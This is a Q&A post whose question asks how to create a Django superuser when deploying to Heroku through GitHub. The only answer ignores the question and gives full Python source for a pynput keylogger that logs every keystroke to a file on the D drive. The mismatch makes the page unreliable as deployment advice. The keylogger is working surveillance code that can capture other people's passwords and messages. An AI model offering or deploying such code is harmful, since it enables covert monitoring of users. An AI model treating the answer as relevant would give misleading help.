# Heroku deployments via Github ,Superuser Creation

Tags: python, operating-system, bots

I have deployed an app to Heroku via GitHub, and I have run the migration by adding

---

`release: python manage.py migrate`

---

to the Procfile.
I know I need to create a superuser (If I was using the CLI it's straightforward)But I need a way I can do that explicitly using GitHub deployment.

Answer (score 1):

As per my research it is hard to track all the events

But you can create a keylogger, Which tracks the key strokes and saves it

Here is the code:-

```
# keylogger using pynput module 
   
import pynput 
from pynput.keyboard import Key, Listener 
   
keys = [] 
   
def on_press(key): 
      
    keys.append(key) 
    write_file(keys) 
      
    try: 
        print('alphanumeric key {0} pressed'.format(key.char)) 
          
    except AttributeError: 
        print('special key {0} pressed'.format(key)) 
           
def write_file(keys): 
      
    with open('D:/log.txt', 'w') as f: # This will save in D drive as log.txt
        for key in keys: 
              
            # removing '' 
            k = str(key).replace("'", "") 
            f.write(k) 
                      
            # explicitly adding a space after  
            # every keystroke for readability 
            f.write(' ')  
               
def on_release(key): 
                      
    print('{0} released'.format(key)) 
    if key == Key.esc: 
        # Stop listener 
        return False
   
   
with Listener(on_press = on_press, 
              on_release = on_release) as listener: 
                      
    listener.join()
```